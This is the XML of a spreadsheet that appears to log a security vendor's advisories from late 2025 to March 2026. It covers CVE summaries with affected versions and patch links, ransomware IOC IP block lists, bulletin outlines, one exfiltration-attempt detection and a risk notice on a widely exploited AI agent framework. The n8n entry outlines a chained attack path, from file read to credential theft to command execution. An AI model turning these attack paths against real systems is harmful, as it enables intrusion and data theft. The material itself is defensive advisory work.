    <t>PowerShell 远程代码执行漏洞CVE-2025-54100</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Windows更新最新版本。
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54100</t>
  </si>
  <si>
    <t>未经身份验证的远程攻击者可以通过社会工程诱使受害者通过Powershell访问攻击者的特制网站，从而导致远程代码执行。</t>
  </si>
  <si>
    <t>V25122616764</t>
  </si>
  <si>
    <t>1. 影响组件：Powershell   影响范围：影响范围见附件</t>
  </si>
  <si>
    <t>2025-12-26 16:20:03</t>
  </si>
  <si>
    <t>0天21时13分</t>
  </si>
  <si>
    <t>MongoDB 未授权内存泄露漏洞CVE-2025-14847</t>
  </si>
  <si>
    <t>官方解决方案：
下载链接：https://github.com/mongodb/mongo/tags</t>
  </si>
  <si>
    <t>MongoDB Server存在一个内存泄漏漏洞，未经授权的攻击者可以通过发送格式错误的数据包，触发堆内存错误，读取内存数据，导致敏感信息泄露。</t>
  </si>
  <si>
    <t>V25122913180</t>
  </si>
  <si>
    <t>1. 影响组件：Mongodb   影响范围：8.2.0 ≤ MongoDB Server ≤ 8.2.2
8.0.0 ≤ MongoDB Server ≤ 8.0.16
7.0.0 ≤ MongoDB Server ≤ 7.0.27
6.0.0 ≤ MongoDB Server ≤ 6.0.26
5.0.0 ≤ MongoDB Server ≤ 5.0.31
MongoDB Server ≤ 4.4.29</t>
  </si>
  <si>
    <t>2025-12-29 16:02:01</t>
  </si>
  <si>
    <t>1天10时56分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251231</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251231】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
45.114.106[.]48
156.234.71[.]17</t>
  </si>
  <si>
    <t>V25123106203</t>
  </si>
  <si>
    <t>156.234.71.17、45.114.106.48</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260107</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260107】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
23.226.52[.]129
156.234.208[.]83
156.234.71[.]26
45.114.106[.]59
160.124.104[.]148</t>
  </si>
  <si>
    <t>V26010705058</t>
  </si>
  <si>
    <t>156.234.71.26、156.234.208.83、45.114.106.59、160.124.104.148、23.226.52.129</t>
  </si>
  <si>
    <t>12月份（下半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖12月份（下半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、《网络安全标准实践指南——数据库联网安全要求》正式发布
2、《网络安全标准实践指南——网络数据标签标识技术规范（征求意见稿）》公开征求意见
3、《中华人民共和国网络安全法》完成重大修订，于 2026 年 1 月 1 日正式施行
（二）国际政策热点
1、美国防部推出专用 AI 平台 GenAI.mil，旨在全面融入军事工作
2、新规前瞻 | NIST 为家庭医疗物联网划定网络安全基线
3、韩国出台强制网络安全新规：办理手机号全面实施人脸识别认证
二、安全热点时事资讯 
（一）国内安全事件
1、某公司数据安全“四大皆空”，被依法处罚！
2、某国企海外子公司疑遭勒索软件组织攻击，敏感数据外泄
（二） 国际安全事件
1、谷歌精选插件被曝大规模窃取用户隐私数据
2、黑客复仇式入侵法国内政部，1/4 法国人信息或流入黑产
3、系统瘫痪，石油货物运输暂停，委内瑞拉石油公司遭遇破坏性网络攻击
4、法国邮政金融系统确认遭遇旨在让系统彻底瘫痪的定向打击
5、全球知名跨国科技公司罗技遭勒索攻击，约 2TB 数据流向暗网
三、安全风险通告
（一）帆软 FineReport SQL 注入漏洞
（二）n8n 远程代码执行漏洞(CVE-2025-68613)
（三）PowerShell 远程代码执行漏洞 (CVE-2025-54100)
（四）MongoDB 未授权内存泄露漏洞(CVE-2025-14847)
四、12 月份 CNVD 漏洞收录情况
（一） 漏洞分类统计
（二） 漏洞被关注情况
（三） 漏洞趋势</t>
  </si>
  <si>
    <t>V26010805766</t>
  </si>
  <si>
    <t>2026-01-08 10:24:52</t>
  </si>
  <si>
    <t>0天21时44分</t>
  </si>
  <si>
    <t>n8n 远程代码执行漏洞CVE-2026-21858</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将n8n更新到最新版本。
下载链接：https://github.com/n8n-io/n8n/releases</t>
  </si>
  <si>
    <t>n8n 工作流自动化平台‌存在远程代码执行漏洞，源于处理 HTTP 请求时的“Content-Type 混淆”逻辑错误，表单 Webhook 节点的prepareFormReturnItem函数未验证请求类型便盲目信任req.body.files内容，使得未经身份验证的攻击者可通过构造特定 JSON 请求实现任意文件读取，进而窃取数据库和配置文件中的凭据与加密密钥、伪造管理员会话 Cookie 登录系统，最终通过创建含“执行命令”节点的工作流执行任意命令控制服务器。</t>
  </si>
  <si>
    <t>V26010905947</t>
  </si>
  <si>
    <t>1. 影响组件：n8n   影响范围：n8n &lt; 1.121.0</t>
  </si>
  <si>
    <t>2026-01-09 10:50:06</t>
  </si>
  <si>
    <t>0天20时21分</t>
  </si>
  <si>
    <t>Apache Struts XML外部实体注入漏洞CVE-2025-68493</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Apache Struts更新到6.1.1及以上版本。
下载链接：https://struts.apache.org/download.cgi</t>
  </si>
  <si>
    <t>Apache Struts 存在XML外部实体注入漏洞，XWork-Core 组件在解析XML配置文件时，未对XML外部实体进行充分校验与限制，导致攻击者可通过构造恶意XML内容触发外部实体解析。成功利用后，可能造成敏感数据泄露、拒绝服务等安全影响。</t>
  </si>
  <si>
    <t>V26011408779</t>
  </si>
  <si>
    <t>1. 影响组件：Apache Struts   影响范围：2.0.0 ≤ Apache Struts ≤ 2.3.37
2.5.0 ≤ Apache Struts ≤ 2.5.33
6.0.0 ≤ Apache Struts ≤ 6.1.0</t>
  </si>
  <si>
    <t>2026-01-14 14:57:17</t>
  </si>
  <si>
    <t>0天19时22分</t>
  </si>
  <si>
    <t>微软补丁日安全通告|1月份_2026</t>
  </si>
  <si>
    <t>【漏洞详情】
【桌面窗口管理器信息泄露漏洞 CVE-2026-20805】
DWM 桌面窗口管理器是自 Windows Vista 以来 Microsoft Windows 中的合成窗口管理器，它允许使用硬件加速来呈Windows 的图形用户界面。它最初是为了启用部分新的“ Windows Aero ”用户体验而创建的，它允许诸如透明度、3D 窗口切换等效果。
其中存在信息泄露漏洞，攻击者可以利用该漏洞在目标系统获取未授权的信息。该漏洞存在在野利用，经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
【安全引导证书过期安全功能绕过漏洞 CVE-2026-21265】
Secure Boot（安全启动） 是 Windows 依托 UEFI 固件 提供的一项启动完整性保护机制，用于在系统启动早期阻止未签名或被篡改的启动组件执行，从而防御引导级恶意软件（如 bootkit、rootkit）。
其中存在安全功能绕过漏洞，攻击者可以利用该漏洞在绕过目标系统上的安全功能，做出规定之外的行为。漏洞经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20805
2. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21265</t>
  </si>
  <si>
    <t>V26011508656</t>
  </si>
  <si>
    <t>2026-01-15 14:39:53</t>
  </si>
  <si>
    <t>0天16时39分</t>
  </si>
  <si>
    <t>Fortinet FortiSIEM phMonitor服务命令注入漏洞CVE-2025-64155</t>
  </si>
  <si>
    <t>Fortinet已发布最新版本修复该漏洞，建议受影响用户更新到以下版本：
下载链接：https://fortiguard.fortinet.com/psirt/FG-IR-25-772</t>
  </si>
  <si>
    <t>Fortinet FortiSIEM的phMonitor服务存在命令注入漏洞，未经授权的攻击者可以利用该漏洞发送恶意的TCP请求，以root权限执行任意命令，导致服务器失陷。</t>
  </si>
  <si>
    <t>V26011512499</t>
  </si>
  <si>
    <t>1. 影响组件：Fortinet FortiSIEM   影响范围：7.3.0 ≤ Fortinet FortiSIEM ≤ 7.3.4
7.2.0 ≤ Fortinet FortiSIEM ≤ 7.2.6
7.1.0 ≤ Fortinet FortiSIEM ≤ 7.1.8
7.0.0 ≤ Fortinet FortiSIEM ≤ 7.0.4
6.7.0 ≤ Fortinet FortiSIEM ≤ 6.7.10</t>
  </si>
  <si>
    <t>2026-01-15 15:44:48</t>
  </si>
  <si>
    <t>0天22时36分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260116</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260116】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
160.124.146[.]225
23.235.173[.]5
103.44.88[.]13
160.124.146[.]232
160.124.152[.]134
156.234.254[.]134
156.234.254[.]136
156.234.254[.]140
156.234.254[.]145</t>
  </si>
  <si>
    <t>V26011609173</t>
  </si>
  <si>
    <t>103.44.88.13、156.234.254.140、156.234.254.145、160.124.152.134、156.234.254.136、23.235.173.5、156.234.254.134、160.124.146.225、160.124.146.232</t>
  </si>
  <si>
    <t>2026-02-28 15:03:33</t>
  </si>
  <si>
    <t>1天23时22分</t>
  </si>
  <si>
    <t>1月份（上半月刊）安全通告_2026</t>
  </si>
  <si>
    <t>通告涵盖1月份（上半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、网安标委下达6项网络安全推荐性国家标准计划
2、网络安全新规：两部门联合发布网络交易平台监管办法，压实平台数据安全责任
3、网安标委发布《网络安全标准实践指南——人工智能加速芯片安全功能技术规范》
（二）国际政策热点
1、美国国防部发布备忘录，拓宽安全身份认证途径
2、ISACA 获授权主导CMMC认证体系，规范国防网络安全标准
3、英国正式发布《政府网络行动计划》，重置国家网络安全战略
二、安全热点时事资讯 
（一）国内安全事件
1、黑客入侵企业系统向境外贩卖数据终落网
2、重庆一企业运营网站未完全履行网络安全保护义务被约谈
3、《英雄联盟》证书过期登微博热搜，众多玩家无法正常登陆 
（二） 国际安全事件
1、委内瑞拉事件：现代战争中网络攻击正在产生颠覆性影响
2、币安旗下 Trust Wallet 遭供应链攻击，官方或将赔付 850 万美元
3、日产汽车再遭勒索攻击，经销商运营数据、财务数据等 900GB 内部数据泄露
4、西班牙最大电力公司 Endesa 确认数据泄露，2000 万条数据或将流向暗网
三、安全风险通告
（一）n8n 远程代码执行漏洞(CVE-2026-21858)
（二）Apache Struts XML 外部实体注入漏洞（CVE-2025-68493）
四、微软安全通告
（一） 漏洞概要
（二） 漏洞数据分析
1、 漏洞数量趋势
2、 历史微软补丁日1月漏洞对比
3、 漏洞数量分析
（三） 重要漏洞分析
1、 漏洞分析
2、 影响范围
3、 修复建议</t>
  </si>
  <si>
    <t>V26012005087</t>
  </si>
  <si>
    <t>2026-01-20 09:59:50</t>
  </si>
  <si>
    <t>0天20时9分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260121</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260121】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
43.243.188[.]135
43.243.188[.]137
156.234.254[.]157</t>
  </si>
  <si>
    <t>V26012104889</t>
  </si>
  <si>
    <t>43.243.188.137、43.243.188.135、156.234.254.157</t>
  </si>
  <si>
    <t>Oracle WebLogic Server Proxy Plug-in 身份认证绕过漏洞CVE-2026-21962</t>
  </si>
  <si>
    <t>官方已发布补丁修复该漏洞，建议受影响用户参考以下链接进行修复：
参考链接：https://www.oracle.com/security-alerts/cpujan2026.html</t>
  </si>
  <si>
    <t>Oracle WebLogic Server Proxy Plug-in 存在身份认证绕过漏洞，插件在解析或转发来自前端 Web 服务器的请求时，未能正确验证和校验访问者的身份与权限。使得未经身份认证的远程攻击者能够通过精心构造特制的 HTTP 请求报文，直接获得等同于插件自身的访问权限，从而对插件所能接触到的后端数据和功能进行未经授权的任意操作，最终导致权限提升和关键数据泄露。</t>
  </si>
  <si>
    <t>V26012308720</t>
  </si>
  <si>
    <t>1. 影响组件：WebLogic Server Proxy Plug-in   影响范围：Oracle HTTP Server：12.2.1.4.0、14.1.1.0.0、14.1.2.0.0
WebLogic Server Proxy Plug-in for Apache：12.2.1.4.0、14.1.1.0.0、14.1.2.0.0
WebLogic Server Proxy Plug-in for IIS：12.2.1.4.0</t>
  </si>
  <si>
    <t>2026-01-23 15:11:05</t>
  </si>
  <si>
    <t>0天16时58分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260123</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260123】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.89[.]232
23.235.172[.]7</t>
  </si>
  <si>
    <t>V26012312860</t>
  </si>
  <si>
    <t>156.234.89.232、23.235.172.7</t>
  </si>
  <si>
    <t>Microsoft Office 安全功能绕过漏洞CVE-2026-21509</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Microsoft Office更新到最新版本。
参考链接：https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509</t>
  </si>
  <si>
    <t>Microsoft Office 存在安全功能绕过漏洞，攻击者可利用此漏洞构造特制文档，以绕过Microsoft Office中用于防御不安全OLE对象的防护机制。攻击实施需诱使用户打开恶意Office文件，未经身份验证的攻击者可利用此漏洞发起攻击，该漏洞已被发现在野利用。</t>
  </si>
  <si>
    <t>V26012806187</t>
  </si>
  <si>
    <t>1. 影响组件：Microsoft Office   影响范围：Microsoft Office 2016
Microsoft Office 2019
Microsoft Office LTSC 2021
Microsoft Office LTSC 2024
Microsoft 365 Apps for Enterprise</t>
  </si>
  <si>
    <t>2026-01-28 10:42:22</t>
  </si>
  <si>
    <t>1天15时10分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260130</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260130】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.254[.]131
160.124.146[.]252
103.37.2[.]2
160.124.146[.]237
160.124.152[.]190</t>
  </si>
  <si>
    <t>V26013010220</t>
  </si>
  <si>
    <t>160.124.146.237、103.37.2.2、160.124.146.252、156.234.254.131、160.124.152.190</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260206</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260206】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
160.124.152[.]167
160.124.152[.]158
156.234.94[.]193
38.173.16[.]90
156.234.209[.]38
160.124.146[.]254
156.234.33[.]66
107.149.167[.]107
156.234.33[.]72
23.235.179[.]100
43.243.191[.]225</t>
  </si>
  <si>
    <t>V26020611310</t>
  </si>
  <si>
    <t>43.243.191.225、160.124.146.254、23.235.179.100、160.124.152.158、156.234.33.72、156.234.33.66、156.234.94.193、38.173.16.90、156.234.209.38、107.149.167.107、160.124.152.167</t>
  </si>
  <si>
    <t>1月份（下半月刊）安全通告_2026</t>
  </si>
  <si>
    <t>通告涵盖1月份（下半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、国务院办公厅印发《政务移动互联网应用程序规范化管理办法》
2、2026年度第一批网络安全国家标准需求发布
（二）国际政策热点
1、美国陆军部长计划在多个军事基地停用NIPRNet
2、欧盟启动全球CVE分配系统，强化数字主权        
3、欧盟委员会提议修订《网络安全法案》（《网络安全法案2.0》）        
4、爱尔兰拟立法为警方使用间谍软件确立法律基础        
二、安全热点时事资讯         
（一）国内安全事件        
1、入侵网站盗数据、跨境牟利触法网！两名犯罪嫌疑人被云南网警抓获        
2、工程师以技术手段窃取赌博网站184万余名中国公民个人信息        
3、B站涌现带毒软件传播新手段，供应链攻击威胁加剧        
（二） 国际安全事件        
1、美国某头部银行被植入键盘记录器，潜伏窃取20万登录凭证        
2、伊朗国家电视台的信号被劫持，播放反政府视频煽动暴乱        
3、比利时AZ Monica医院遭网络攻击，服务器被迫关闭，手术全部取消        
4、麦当劳印度公司遭勒索组织攻击，861GB核心运营与财务数据被窃取        
5、苹果第二大代工厂立讯精密疑遭勒索攻击，机密数据外泄        
6、耐克遭勒索组织攻击，产品开发、制造运营等1.4TB核心数据被窃取        
三、安全风险通告        
（一）Oracle WebLogic Server Proxy Plug-in身份认证绕过漏洞(CVE-2026-21962)        
（二）Microsoft Office 安全功能绕过漏洞(CVE-2026-21509)        
四、1月份CNVD漏洞收录情况        
（一） 漏洞分类统计        
（二） 漏洞被关注情况        
（三） 漏洞趋势        
附录：1月份重要漏洞信息汇总</t>
  </si>
  <si>
    <t>V26020619499</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260226</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260226】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
23.235.169[.]66
23.235.173[.]26
23.226.58[.]225
156.234.92[.]161
156.234.94[.]222
43.249.175[.]66
43.249.172[.]97
156.234.94[.]219
23.235.163[.]205
156.234.94[.]210
156.234.56[.]34
23.235.172[.]2
156.234.254[.]135
156.234.121[.]161
23.235.172[.]24
23.235.182[.]100
23.235.163[.]33
156.234.94[.]201
156.234.247[.]110
23.226.52[.]135
103.37.2[.]10
23.226.52[.]130
156.234.21[.]196</t>
  </si>
  <si>
    <t>V26022610143</t>
  </si>
  <si>
    <t>43.249.172.97、23.235.172.24、156.234.121.161、23.226.52.130、156.234.247.110、23.226.52.135、156.234.94.201、156.234.94.222、156.234.254.135、23.235.173.26、156.234.92.161、23.235.163.33、23.235.172.2、156.234.56.34、103.37.2.10、23.235.169.66、23.226.58.225、23.235.182.100、156.234.94.210、156.234.94.219、23.235.163.205、156.234.21.196、43.249.175.66</t>
  </si>
  <si>
    <t>2月份（月刊）安全通告_2026</t>
  </si>
  <si>
    <t>通告涵盖2月份（月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态        
（一）国内政策热点
1、工信部等八部门联合印发《汽车数据出境安全指引（2026版）》
2、网安标委下达7项网络安全推荐性国家标准计划
3、网安标委发布《网络安全标准实践指南——网络数据标签标识技术要求》
4、3项网络安全国家标准获批发布
（二）国际政策热点
1、印度发布《军事量子任务政策框架》        
2、法国发布《国家网络安全战略（2026-2030）》        
3、白宫网络总监办公室制定AI安全政策框架
二、安全热点时事资讯 
（一）国内安全事件
1、内容安全失守代价惨重：快手平台因未处置违法信息被罚1.19亿元
2、第三方平台违规存储，导致12306账号内惊现“陌生乘客”且无法删除
3、重庆某企业未履行网络安全保护义务，企业负责人被约谈
4、滥用技术参与黑产犯罪的警示：三名大厂高薪员工兼职破解系统被抓
（二） 国际安全事件
1、网络武器库泄露启示录：Exploit Pack事件敲响企业供应链安全警钟
2、因索要赎金遭拒，黑客组织公开哈佛、宾大百万条窃取的个人信息
3、Step Finance 称高管设备遭入侵，致 4000 万美元加密货币被盗
4、支付命脉遭掐断：BridgePay勒索攻击致全美数千商户业务瘫痪        
5、六百万用户数据遭窃：荷兰运营商Odido数据泄露事件剖析
6、AI代理成新攻击面：OpenClaw框架遭大规模利用，超三万实例沦陷
7、支付页面遭前端劫持：某全球零售巨头电商遭遇“二次下单”攻击
三、安全风险通告
（一）n8n 表达式沙箱逃逸导致远程代码执行漏洞(CVE-2026-25049)
四、微软安全通告
（一） 漏洞概要        
（二） 漏洞数据分析
（三） 重要漏洞分析
五、2月份CNVD漏洞收录情况
附录：2月份重要漏洞信息汇总</t>
  </si>
  <si>
    <t>V26030506998</t>
  </si>
  <si>
    <t>2026-03-05 10:29:09</t>
  </si>
  <si>
    <t>1天8时32分</t>
  </si>
  <si>
    <t>内部威胁-&gt;异常操作</t>
  </si>
  <si>
    <t>异常操作</t>
  </si>
  <si>
    <t>检测到SQL server数据库尝试进行外带数据攻击</t>
  </si>
  <si>
    <t>已推送处置确认，后续继续观察</t>
  </si>
  <si>
    <t>0天1时15分</t>
  </si>
  <si>
    <t>OpenClaw 安全性风险全链路分析及提示</t>
  </si>
  <si>
    <t>【深信服-紧急事件通告】 
OpenClaw 安全性风险全链路分析及提示
【OpenClaw 介绍】
OpenClaw（前身为 Clawdbot、Moltbot）是 2025 年 11 月上线的开源 AI Agent 框架，该项目被开发者定义为“真正可以执行任务的 AI”，以惊人速度成为 GitHub 历史上增长最快的现象级项目之一，上线以来累计超过 200,000 颗星。然而，其爆炸式增长暴露出严重的安全问题，漏洞数量之多、影响之广，在 AI 工具领域尚属罕见。
【OpenClaw 漏洞风险】
随着 OpenClaw 的广泛部署，一系列安全漏洞被陆续发现并分配了 CVE 编号。
已披露漏洞统计：
1、总计80余个CVE漏洞：截至2026年3月初，已披露80余个OpenClaw相关CVE漏洞
2、3个存在公开利用代码：可实现远程代码执行
3、修复进度：截至2026年2月26日发布的v2026.2.26版本，已修复超过40个漏洞
【加固建议】
OpenClaw可访问用户文件系统、执行Shell命令、调用各类第三方服务凭据，一旦被攻击者控制，将导致用户数字权限完全泄露。在企业环境中，单个被入侵实例可成为内网横向移动跳板，引发核心数据窃取、关键系统受控等严重安全事件，对于个人用户来说，隐私信息存在被窃取风险。
对企业用户的建议：
1、紧急处置与基础防护
（一）漏洞闭环与凭据管理
（二）网络层面防护
（三）认证与权限管控
2、长效安全管控
（一）供应链与插件管理
（二）监控与审计机制
（三）企业政策与流程管控</t>
  </si>
  <si>
    <t>V26031016375</t>
  </si>
  <si>
    <t>2026-03-17 10:42:17</t>
  </si>
  <si>
    <t>6天18时22分</t>
  </si>
  <si>
    <t>微软补丁日安全通告|3月份_2026</t>
  </si>
  <si>
    <t>【漏洞详情】
【SQL Server特权提升漏洞 CVE-2026-21262】
Microsoft SQL Server是微软推出的关系型数据库管理系统，为企业级应用提供数据存储、查询、事务处理与权限管理等核心服务，广泛应用于各类业务系统、后台服务与数据平台，负责处理结构化数据、保障数据一致性与访问安全。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高权限。经过评估，该漏洞危害较大，我们建议用户及时更新微软安全补丁。
【.NET 拒绝服务漏洞 CVE-2026-26127】
.NET 是微软推出的跨平台开发框架，为各类应用提供统一的运行时环境、基础类库与安全机制，广泛用于构建 Web 服务、桌面应用与云原生程序，保障应用的兼容性、安全性与运行效率。
其中存在拒绝服务漏洞，攻击者可利用该漏洞通过网络向基于 .NET 的应用发送特制请求，导致应用崩溃、服务不可用。经过评估，该漏洞危害较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1、https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21262
2、https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26127</t>
  </si>
  <si>
    <t>V26031315164</t>
  </si>
  <si>
    <t>2026-03-13 14:55:16</t>
  </si>
  <si>
    <t>1天1时6分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</si>
</sst>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yyyy/m/d;@"/>
    <numFmt numFmtId="178" formatCode="h:mm:ss;@"/>
    <numFmt numFmtId="179" formatCode="0.00_ "/>
    <numFmt numFmtId="180" formatCode="0\.0,&quot;万&quot;"/>
    <numFmt numFmtId="181" formatCode="0_ "/>
  </numFmts>
  <fonts count="53">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF14161A"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体-简"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFC00000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFFC000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="5" tint="0.4"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF0070C0"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="微软雅黑"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="15"/>
      <color rgb="FFE1F9FE"/>
      <name val="OPPOSans-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
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFC000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFFC000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFC00000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFC00000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="53">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDCE6F1"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF1F497D"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF1F9940"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE65050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF365FD9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFA830C"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF992E2E"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF3DA5F5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
